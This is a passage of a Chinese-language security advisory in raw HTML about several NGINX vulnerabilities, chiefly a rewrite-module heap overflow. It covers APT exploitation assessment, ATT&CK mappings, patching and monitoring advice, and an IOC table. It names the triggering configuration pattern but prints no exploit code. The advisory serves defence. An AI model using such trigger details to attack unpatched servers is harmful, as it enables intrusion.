2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-40701：SSL模块释放后使用</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">TLS连接关闭时，若异步OCSP DNS解析尚未完成，上下文池被销毁但解析器请求未被取消。后续DNS计时器回调将对已释放的内存指针进行解引用。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-42934：Charset模块越界读取</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Charset模块在处理跨代理缓冲区边界的不完整UTF-8序列时存在off-by-one错误，导致长度状态损坏，计算出负的源偏移量，在分配的上游缓冲区前读取2字节。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">APT威胁态势评估</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">利用可能性分析</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-42945作为高严重性远程代码执行漏洞，具备以下APT利用特征：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">漏洞成熟度</span></b><span leaf="">：漏洞代码存在18年，利用思路清晰，公开的概念验证代码可直接适配</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">攻击面广泛</span></b><span leaf="">：NGINX作为全球使用最广泛的Web服务器之一，占据约三分之一的市场份额，部署量巨大</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">利用门槛中等</span></b><span leaf="">：需要特定的配置组合（rewrite含问号 + set引用捕获组），但目标配置广泛存在于API网关场景</span></span></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁行为体关注点</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国家级APT组织通常将此类基础组件漏洞作为：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">Initial Access阶段</span></b><span leaf="">：通过Web边界设备获得内网立足点</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">Lateral Movement载体</span></b><span leaf="">：攻陷Web服务器后进一步横向移动至后端系统</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">供应链投毒潜力</span></b><span leaf="">：若攻击者同时掌握构建环境，可进一步扩展影响范围</span></span></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">战术技术演变预测</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">根据MITRE ATT&amp;CK框架，该漏洞利用涉及以下技术：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">T1190</span></b><span leaf="">：利用面向公众的应用组件</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">T1059.003</span></b><span leaf="">：命令和脚本解释器（通过成功利用获得shell）</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">T1543.003</span></b><span leaf="">：创建或修改系统进程（维持持久化）</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">预计后续将出现针对该漏洞的自动化利用工具，降低攻击门槛。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">防护建议</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">紧急处置</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">立即统计境内部署的NGINX版本，识别0.6.27至1.30.0版本（开源版）及R32至R36版本（Plus版）的部署实例</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">检查现有配置中是否包含rewrite指令含问号且后续存在set指令引用捕获组的组合模式</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">在Web应用层之前部署WAF规则，检测异常HTTP请求路径特征</span></span></li></ol><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">缓解措施</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">升级至NGINX最新稳定版本（1.30.0+），确认供应商已发布的补丁已应用</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">启用ASLR、DEP等系统级内存保护机制，增加利用难度</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">以低权限账户运行NGINX worker进程，限制成功利用后的影响范围</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">实施网络分段，限制Web服务器与后端关键系统的直接通信</span></span></li></ol><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">监控策略</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">部署内存完整性监控工具，检测heap overflow特征行为</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">监控Web服务器进程异常退出和资源消耗异常</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">建立NGINX配置变更的完整性校验机制</span></span></li></ol><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结论</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-42945代表了基础组件中长期潜伏漏洞的典型风险模式。该漏洞根因在于2008年引入的代码设计缺陷，在特定配置组合下可被触发导致堆缓冲区溢出。鉴于NGINX的广泛部署和漏洞的严重性，APT组织极有可能将其纳入武器库。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">建议安全运营团队将此次披露作为优先级事件进行响应，在确认受影响资产范围后尽快推进修复工作。考虑到公开漏洞利用代码的存在，</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">修补窗口期应尽可能压缩至72小时内</span></strong><span leaf="">。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">IOC指标</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">类型</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">值</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">说明</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-42945</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Critical (9.2)</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ngx_http_rewrite_module堆溢出</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-42946</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">High (8.3)</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">SCGI/UWSGI模块内存分配问题</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-40701</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Medium (6.3)</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ngx_http_ssl_module UAF</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-42934</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Medium (6.3)</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ngx_http_charset_module越界读取</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: 